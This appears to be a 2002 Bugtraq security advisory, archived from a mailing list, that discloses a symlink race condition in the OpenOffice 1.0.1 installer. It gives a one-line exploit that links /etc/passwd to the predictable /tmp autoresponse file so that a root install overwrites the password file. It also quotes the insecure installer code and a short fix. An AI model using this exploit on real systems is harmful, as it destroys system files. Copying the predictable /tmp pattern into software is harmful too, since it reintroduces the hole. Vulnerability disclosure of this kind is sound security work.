81012 2002-10-11  18:54  /51 rader/ Larry W. Cashdollar <lwc@vapid.ath.cx>
Importerad: 2002-10-11  18:54  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <1897>
Ärende: OpenOffice 1.0.1 Race condition during installation.
------------------------------------------------------------
		 	Vapid Labs
                    Larry W. Cashdollar
			  9/9/02

Summary: OpenOffice 1.0.1 Race condition during installation can
overwrite system files.

Severity: Low

Description: A very simple and easy to exploit race condition exist during the
 installation of OpenOffice.  During this window a malicous user could create a
 symlink in /tmp and overwrite arbitrary files.

Exploit:

As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

Where $USERNAME is the installer account name, probably root.

will result in the password file being over written with:

# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF

Fix:
    Create a directory under /tmp to work from.  With restrictive permissions.

References:

http://www.openoffice.org/dev_docs/source/1.0.1/index.html

Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx
(81012) /Larry W. Cashdollar <lwc@vapid.ath.cx>/(Ombruten)